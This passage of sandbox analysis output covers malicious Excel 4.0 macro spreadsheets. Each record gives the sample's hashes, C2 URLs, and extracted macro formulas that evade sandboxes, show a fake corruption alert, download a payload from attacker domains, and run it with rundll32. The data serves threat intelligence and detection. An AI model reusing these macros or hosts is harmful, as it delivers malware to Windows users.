CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"msXxXhBka1\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"329fea8c599ce4b1aef144916ad5e228fd268be51eaedefef6043c8755eae40c"},"analysis":{"reported":"2020-04-09T16:15:40Z","score":10},"files":[{"filename":"329fea8c599ce4b1aef144916ad5e228fd268be51eaedefef6043c8755eae40c","filesize":214528,"md5":"824582ce2206f2160a5c2a90d6ec0a61","sha1":"7f7aef6cf4454664314163b0d6d62a38bd2bb1a8","sha256":"329fea8c599ce4b1aef144916ad5e228fd268be51eaedefef6043c8755eae40c","sha512":"6ad7882d0e0fda9ebb1e9967a543b0af33d50d3a923575422fec19f5d7c76bff511246456b6efd8fba0c0375f13b2ba9e31a091b377e860d4043a4d07ee9ac1f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"329fea8c599ce4b1aef144916ad5e228fd268be51eaedefef6043c8755eae40c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"uXl4OtXAU0\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"32a733f34ea25aa09538ff480c3b58d887b8dbdf307cbe652926755913d81d90"},"analysis":{"reported":"2020-04-09T16:15:40Z","score":10},"files":[{"filename":"32a733f34ea25aa09538ff480c3b58d887b8dbdf307cbe652926755913d81d90","filesize":144384,"md5":"5c0fcd8867f328570fee7a6854f66ba1","sha1":"235a2fb3d18b1639a0c390be2caa17ea74ff406a","sha256":"32a733f34ea25aa09538ff480c3b58d887b8dbdf307cbe652926755913d81d90","sha512":"434b73c33a95ed249eef6a46f6ed05116314366e731e33e5b6cf70be75631b601e82d90b5d048a8aa9772ba6175b102eb6e85d4c59510836afce4b0cf7d11c98","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"32a733f34ea25aa09538ff480c3b58d887b8dbdf307cbe652926755913d81d90.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"uXPsrb1SEv\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"32a8796c420ed2d3343d31e317614b7f635986ca2aaec5b5e822757b7e43c5be"},"analysis":{"reported":"2020-04-09T16:15:40Z","score":10},"files":[{"filename":"32a8796c420ed2d3343d31e317614b7f635986ca2aaec5b5e822757b7e43c5be","filesize":116224,"md5":"aa4b3b2b74bdfb71782afb09ebfa3dcd","sha1":"df155ae75754754b5d76b57e2f019c05db0549b2","sha256":"32a8796c420ed2d3343d31e317614b7f635986ca2aaec5b5e822757b7e43c5be","sha512":"422efac8b56b9542e158ea34d8dbdad2f7d05819d0b83c530e510fed45c07409f8013d1f356513591e2b323b2f79fd7f3476ee1f3f1d75ef492386a7029b0132","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"32a8796c420ed2d3343d31e317614b7f635986ca2aaec5b5e822757b7e43c5be.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"fCdrr31RfF\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"32ba9bc5fe26d50d45297d744749d09573a3cdbe20401eca984d6f8901051ae1"},"analysis":{"reported":"2020-04-09T16:15:40Z","score":10},"files":[{"filename":"32ba9bc5fe26d50d45297d744749d09573a3cdbe20401eca984d6f8901051ae1","filesize":206336,"md5":"5aee505d42c2d9ad8794b222da1bcc27","sha1":"f4658f201d54c4b087bb7df9672abc7ed8f010a2","sha256":"32ba9bc5fe26d50d45297d744749d09573a3cdbe20401eca984d6f8901051ae1","sha512":"aba86e7c7b33323ede9cd3cbc13246e92474deed1045aa8450551453f77feed2d9b89d777d5288134c924ee4231aedada288ab305fe8b44038b7665749a883fd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"32ba9bc5fe26d50d45297d744749d09573a3cdbe20401eca984d6f8901051ae1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"atippDaBrH\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"32ccbba0b7040216ddb8141abf8898366d6c3b78021d750e95e24bc2440040d0"},"analysis":{"reported":"2020-04-09T16:15:40Z","score":10},"files":[{"filename":"32ccbba0b7040216ddb8141abf8898366d6c3b78021d750e95e24bc2440040d0","filesize":209920,"md5":"7d9d23dcabfc78429ca5da11f66ee40c","sha1":"533846277f166fab07d57c18e682d5284360ab0c","sha256":"32ccbba0b7040216ddb8141abf8898366d6c3b78021d750e95e24bc2440040d0","sha512":"c3dd10e888ef7c94035cd38870ca705921c1ece307e124fb6bfdd3f0eb3af5d330dfe39f24a0f69c746a25715d69e5d7fd6212e9a14f6c6fd2b200321c1eb25c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"32ccbba0b7040216ddb8141abf8898366d6c3b78021d750e95e24bc2440040d0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"nLY1cT1sqK\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"32d205fdd3e44f378f771b6b88d1a183dc71fc290ecea6b4bf88f30f2fe1cacb"},"analysis":{"reported":"2020-04-09T16:15:40Z","score":10},"files":[{"filename":"32d205fdd3e44f378f771b6b88d1a183dc71fc290ecea6b4bf88f30f2fe1cacb","filesize":168448,"md5":"00698d4d0ffe76f2b05316ad771ce4d7","sha1":"5e0de9410dc97c0f02fe37d95330b055abe09bab","sha256":"32d205fdd3e44f378f771b6b88d1a183dc71fc290ecea6b4bf88f30f2fe1cacb","sha512":"a5a5fcc630564721fdcd277aba4dedd166dba7e77d48e16e69da766d29988451d976231920d049364deeaa3c47d3a2007048e46509e5742c6f5573ee2fa36e54","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"32d205fdd3e44f378f771b6b88d1a183dc71fc290ecea6b4bf88f30f2fe1cacb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"RBoR55djFy\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"32ec4a2f3dd8a404aec07abb0834e95b2c02c5ec94ca3c41ac0b696091ddc692"},"analysis":{"reported":"2020-04-09T16:15:40Z","score":10},"files":[{"filename":"32ec4a2f3dd8a404aec07abb0834e95b2c02c5ec94ca3c41ac0b696091ddc692","filesize":170496,"md5":"d975ea8ce4b586b9e5a7e6ceb5ef4d98","sha1":"d39b56134aaea4ef1cd34e327482435ca6092f2f","sha256":"32ec4a2f3dd8a404aec07abb0834e95b2c02c5ec94ca3c41ac0b696091ddc692","sha512":"0fa036878ff275904e617f6aa4c0dc7eeef2c61d10a4e9b4a8a0ccfbac98f97a38c25e6eec8cfb7a3a95ad61730f5844fc600bba786e77b3a498a2fdf0144962","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"32ec4a2f3dd8a404aec07abb0834e95b2c02c5ec94ca3c41ac0b696091ddc692.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ZU3doz1wqs\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"33159739e11946e75e59761febf5f02658ea6d85acc692492ca13789b9f2c6c6"},"analysis":{"reported":"2020-04-09T16:15:41Z","score":10},"files":[{"filename":"33159739e11946e75e59761febf5f02658ea6d85acc692492ca13789b9f2c6c6","filesize":185344,"md5":"de5e2502d5e7665abc722bc03d6d759e","sha1":"7b71797804d5fe8d02b3e6bdf3a40f38ef72c5ba","sha256":"33159739e11946e75e59761febf5f02658ea6d85acc692492ca13789b9f2c6c6","sha512":"b08560f76230e7a9b62b6ea9fa727a70be1d5bb8ab9e45beb3dfa25582fcc38cdf6a9b33392ff9aa3a3bebdaf8e6b044a0188c8ed3b99e494e5d027c2ce58bf5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"33159739e11946e75e59761febf5f02658ea6d85acc692492ca13789b9f2c6c6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"332725f8cd1ae48d8fcc75f4bf87246a9acffaa1fa53f5d8da2f2deda0dff3b8"},"analysis":{"reported":"2020-04-09T16:15:41Z","score":10},"files":[{"filename":"332725f8cd1ae48d8fcc75f4bf87246a9acffaa1fa53f5d8da2f2deda0dff3b8","filesize":152576,"md5":"cc2e1d3ecdb722a2c4a4bfcaaccda634","sha1":"66c68d66c2a520b3ef2566bd6d51ee2100e2e4aa","sha256":"332725f8cd1ae48d8fcc75f4bf87246a9acffaa1fa53f5d8da2f2deda0dff3b8","sha512":"2134487c86d2c277f01ed04e935fa090834c7df7dbb5f466f6ca41fcd9a41ce1c8faff61c664122fc7a222b0585d7ccd92e4c34cf5ebf4b93954d0a2eafd4987","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"332725f8cd1ae48d8fcc75f4bf87246a9acffaa1fa53f5d8da2f2deda0dff3b8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"fCZrzFXPWP\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"333fa618f407eaec88b48d40fb6a371e5b6f1013d70e97809751afbddd02e6b5"},"analysis":{"reported":"2020-04-09T16:15:41Z","score":10},"files":[{"filename":"333fa618f407eaec88b48d40fb6a371e5b6f1013d70e97809751afbddd02e6b5","filesize":160768,"md5":"62714f0302ab97f80a5e7a13b49668d0","sha1":"0436757679d098ba249c42d7c8db621d5513c8bb","sha256":"333fa618f407eaec88b48d40fb6a371e5b6f1013d70e97809751afbddd02e6b5","sha512":"e50785d607a2249dfe7217f5fca248a3815c041d43358f4c6cbb19eb49c9fbb9eddbcf0dce19bc94c8944cf1504722211f516fb6664c131bb08a24c34cec8595","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"333fa618f407eaec88b48d40fb6a371e5b6f1013d70e97809751afbddd02e6b5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"qf0yDNl16F\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"33554ceef9ae143768be4e41901dc1e702bd44af4afe8421711c6b8d590be018"},"analysis":{"reported":"2020-04-09T16:15:41Z","score":10},"files":[{"filename":"33554ceef9ae143768be4e41901dc1e702bd44af4afe8421711c6b8d590be018","filesize":185344,"md5":"f5682e10a903346093eb03cfd167f2c8","sha1":"2ad2f94a6deb633d868035f81a6aad1754804857","sha256":"33554ceef9ae143768be4e41901dc1e702bd44af4afe8421711c6b8d590be018","sha512":"8772e39c4d0d47575b758f5eda400dd25a5f7351f8cfc400621befd02c1eeec8d0940dfadc9377c9d07bc46fb23ec9cba09a4340328921f0a5595105893a3e2d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"33554ceef9ae143768be4e41901dc1e702bd44af4afe8421711c6b8d590be018.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"335f1daefe1d21873207f6baa82e91d6c3e5d79d2a9938715b293159c3eecfd3"},"analysis":{"reported":"2020-04-09T16:15:41Z","score":10},"files":[{"filename":"335f1daefe1d21873207f6baa82e91d6c3e5d79d2a9938715b293159c3eecfd3","filesize":142848,"md5":"43fd50221dfe98c9555e0ffb9df550f7","sha1":"e3381657a4f2cc582a4ed3a264aaea9634406887","sha256":"335f1daefe1d21873207f6baa82e91d6c3e5d79d2a9938715b293159c3eecfd3","sha512":"700378825151e8a592c0c87ca961f3c4f6bbdb8dce716511078e09f60b0c6cebac6a94d2640fe34c75ea26c6547ff06c7b8db6c970c2651133aca3d2ef2dcfb6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"335f1daefe1d21873207f6baa82e91d6c3e5d79d2a9938715b293159c3eecfd3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/fsgbfgbfsg43"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"qv362oad18\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3363adff9234b2fb1c5bd8f3c9749106481777a0677017fa6d0279598afa6993"},"analysis":{"reported":"2020-04-09T16:15:41Z","score":10},"files":[{"filename":"3363adff9234b2fb1c5bd8f3c9749106481777a0677017fa6d0279598afa6993","filesize":152576,"md5":"58a0b2bebd258726c3e09cdd279785d1","sha1":"8a0ebc4d12bd14f5d13c65dda710ca35e03452b6","sha256":"3363adff9234b2fb1c5bd8f3c9749106481777a0677017fa6d0279598afa6993","sha512":"dd507683b7b033cebfc7dddd1cc909e6f88b46d284f1fac8156c257d826918717e69bb926c4af66aac72de17473b785e44d007f41c6e4d9e969d21b223529f40","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3363adff9234b2fb1c5bd8f3c9749106481777a0677017fa6d0279598afa6993.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"zocOGFWEo7\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"336dbee2f7682a86fcb844bb0d7937e6a3d4e02ceea67811b21edca57dfb16b5"},"analysis":{"reported":"2020-04-09T16:15:41Z","score":10},"files":[{"filename":"336dbee2f7682a86fcb844bb0d7937e6a3d4e02ceea67811b21edca57dfb16b5","filesize":168448,"md5":"7a92efb9cfd1eb35a8125bbea5b5578e","sha1":"588da68d930042f9535bb75564f597de17173eda","sha256":"336dbee2f7682a86fcb844bb0d7937e6a3d4e02ceea67811b21edca57dfb16b5","sha512":"31ff6b739b236229a1a067a133044caa5b073b0d92cade0ef1035c7e88c496e642dd0537ed5221c99ab9552e6862de8f0121628ed23da26ed88d7594e4fa06a3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"336dbee2f7682a86fcb844bb0d7937e6a3d4e02ceea67811b21edca57dfb16b5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"O6IT9ldAos\",TRUE)\nGOTO(R$0C$11)"}}}]}
